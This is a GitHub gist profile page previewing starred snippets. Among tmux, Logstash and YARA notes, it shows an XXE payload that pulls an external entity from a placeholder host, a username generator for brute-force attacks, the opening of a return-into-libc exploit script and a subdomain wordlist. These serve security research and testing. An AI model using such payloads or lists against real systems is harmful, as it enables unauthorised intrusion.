Skip to content

Instantly share code, notes, and snippets.

View cyberheartmi9's full-sized avatar
:octocat:
Breaking stuff

PikaChu cyberheartmi9

:octocat:
Breaking stuff
375 followers · 27 following
View GitHub Profile
@nicolas-grekas
nicolas-grekas / Advanced-HTTP-en.md
Created June 15, 2011 22:03
Advanced handling of HTTP requests in PHP
@dmethvin
dmethvin / gist:1676346
Created January 25, 2012 13:51
Breakpoint on access to a property
function debugAccess(obj, prop, debugGet){
var origValue = obj[prop];
Object.defineProperty(obj, prop, {
get: function () {
if ( debugGet )
debugger;
return origValue;
},
@MohamedAlaa
MohamedAlaa / tmux-cheatsheet.markdown
Last active November 17, 2024 01:28
tmux shortcuts & cheatsheet

tmux shortcuts & cheatsheet

start new:

tmux

start new with session name:

tmux new -s myname
@jgoodall
jgoodall / README.md
Last active September 19, 2023 18:06
This is a sample of how to send some information to logstash via the TCP input from node.js or python.

This is a sample of how to send some information to logstash via the TCP input in nodejs or python. It assumes the logstash host is on 10.10.10.100 and the TCP listening input is 9563.

The logstash.conf should look something like the sample file.

The log message should be a stringified JSON object with the log message in the @message field.

To use, run the node script node sendMessageToLogstash.js, or the python script python sendMessageToLogstash.js

@superkojiman
superkojiman / namemash.py
Last active November 4, 2024 12:02
Creating a user name list for brute force attacks.
#!/usr/bin/env python3
'''
NameMash by superkojiman
Generate a list of possible usernames from a person's first and last name.
https://blog.techorganic.com/2011/07/17/creating-a-user-name-list-for-brute-force-attacks/
'''
@staaldraad
staaldraad / XXE_payloads
Last active October 8, 2024 15:20
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
@Neo23x0
Neo23x0 / yara_performance_guidelines.md
Last active September 4, 2024 09:14
YARA Performance Guidelines

This Gist has been transfered into a Github Repo. You'll find the most recent version here.

YARA Performance Guidelines

When creating your rules for YARA keep in mind the following guidelines in order to get the best performance from them. This guide is based on ideas and recommendations by Victor M. Alvarez and WXS.

  • Revision 1.4, October 2020, applies to all YARA versions higher than 3.7
@rwestergren
rwestergren / Main.java
Last active November 1, 2020 10:30
GetAndroidSig
import java.io.IOException;
import java.io.InputStream;
import java.lang.ref.WeakReference;
import java.security.cert.CertificateEncodingException;
import java.util.Enumeration;
import java.util.jar.JarEntry;
import java.util.jar.JarFile;
import java.util.logging.Level;
import java.util.logging.Logger;
@mgeeky
mgeeky / exp-chained-fake-frame.py
Last active May 15, 2023 17:33
Exploit presenting `frame faking` technique to chain advanced return-into-libc payloads in non-exec stack environment
#!/usr/bin/python
#
# Example of Frame Faking technique used to construct more advanced
# return-into-libc payloads in non-exec stack environment, as described in:
# The advanced return-into-lib(c) exploits
# by Nergal <[email protected]>
# (http://phrack.org/issues/58/4.html)
#
# To be used:
@jhaddix
jhaddix / all.txt
Last active November 7, 2024 08:01
all wordlists from every dns enumeration tool... ever. Please excuse the lewd entries =/
This file has been truncated, but you can view the full file.
.
..
........
@
*
*.*
*.*.*
🐎